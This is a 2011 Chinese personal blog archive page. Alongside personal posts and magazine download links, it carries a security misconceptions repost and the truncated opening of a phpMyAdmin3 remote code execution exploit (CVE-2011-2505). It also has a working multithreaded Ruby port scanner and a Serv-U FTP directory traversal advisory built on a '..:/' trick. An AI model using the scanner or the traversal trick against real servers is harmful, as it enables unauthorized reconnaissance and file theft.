存档

2011年12月 的存档

信息安全常见误区 zz from caoz

2011年12月31日 6 条评论

转一篇业界前辈caoz写的文章.

原文在 http://hi.baidu.com/caoz/blog/item/81330a55cfea7adab645ae71.html

1. 安全是技术人员的事情

错!太多著名互联网公司因为客服,市场人员的安全意识疏忽,导致严重安全事故。安全意识必须是全员的,每一个接入公司网络的员工,每一个拥有公司邮件账号的员工,都应该具有基本的安全素质。

2.安全就是严防死守,封堵一切入侵途径

错!封堵入侵途径是必要的,但是并不充分,要有意识的考虑,被侵入会怎样?爆库就是典型的例子,在一个真正安全的系统里,数据库被爆仍然要保障密码的安全。要做到多层防御。

3.勤打补丁,永远第一时间更新最新版本,就不会出问题。

错!了解0day后就不会有这个想法了

4.用正版的软件就安全

这种2b观念不解释。 阅读全文…

分类: 安全文摘 标签: , ,

New_Year@2012

2011年12月31日 5 条评论

关于对即将过去的2011年总结及对2012年的展望及YY…

——谨以此文纪念我逝去的2011.

 

2011总结:

2011,事业转换了阵地,离开了让我成长很多的PPS,来到了期盼已久的盛大。

2011,爱情依旧,我还是她的我,她,她还是我的她。

2011,她终于和我在上海会和了,告别了为时3年的异地恋。

2011,有了新的朋友,ladys and gentleman。

2011,成熟了很多,收获了很多,看透了很多。

 

 

2012展望:

2012,2012=世界末日?No,砖家说了,2012≠世界末日!!让我们好好活着吧。

2012,继续学习,学无止境,另外~~主啊,让我们升职,加薪吧…

2012,奔三了,再过几个月都22了,年纪也不小了。

……..且看2013年再回分解!

 

分类: 情感生活 标签: , ,

phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]

2011年12月26日 3 条评论
  1. #!/usr/bin/php
  2. <?php
  3. print_r(‘
  4. +—————————————————————————+
  5. pma3 – phpMyAdmin3 remote code execute exploit [Not jilei(chicken\’s ribs)]
  6. by oldjun(www.oldjun.com)
  7. welcome to www.t00ls.net
  8. mail: oldjun@gmail.com
  9. Assigned CVE id: CVE-2011-2505
  10. +—————————————————————————+
  11. ‘);
  12. /**
  13. * working when the directory:”config” exists and is writeable.
  14. **/
  15. if ($argc < 3) {
  16. print_r(‘
  17. +—————————————————————————+
  18. Usage: php ‘.$argv[0].’ host path
  19. host: target server (ip/hostname)
  20. path: path to pma3
  21. Example:
  22. php ‘.$argv[0].’ localhost /pma/
  23. +—————————————————————————+ 阅读全文…
分类: 应用安全 标签:

飞碟探索-电子版

2011年12月18日 3 条评论

中学时代常看的一本杂志,当年每期都会借来看,今天突然想看看,网上搜集了一下,整理个全集保存下。

试看地址:http://jafee.net/wp-content/uploads/2011/12/飞碟探索2011年10期.pdf

完整下载地址:http://jafee.net/book/fdts_all.rar

1870-2008年国际UFO飞碟照片集

 

下载地址:http://jafee.net/book/fdts_pic.rar

分类: 情感生活 标签:

Linux下多线程扫描

2011年12月6日 4 条评论
#!/usr/bin/ruby -w
require 'socket'
include Socket::Constants

ports = (1..60000).to_a
threads = []
time1 = Time.now
for port in ports
  threads << Thread.new(port) do |theport|
    begin
      sock = Socket.new(AF_INET, SOCK_STREAM, 0)
      sockaddr = Socket.pack_sockaddr_in(theport, ARGV[0])
      sock.connect(sockaddr)
      puts "Port:#{theport} is Opend!\n"
      sock.close
    rescue
      #...
    end
  end
end
threads.each {|thr| thr.join}

puts "\n共耗时:#{Time.now - time1}秒"
分类: 安全工具 标签:

Serv-U FTP Server Jail Break 0day

2011年12月1日 4 条评论
[*]----------------------------------------------------[*]
    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
[*]----------------------------------------------------[*]

/*
通过构造..:/来遍历服务器目录,下载任意文件
影响版本:6.4,7.1,7.3,8.2,10.5
*/

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]

阅读全文…

分类: 应用安全 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress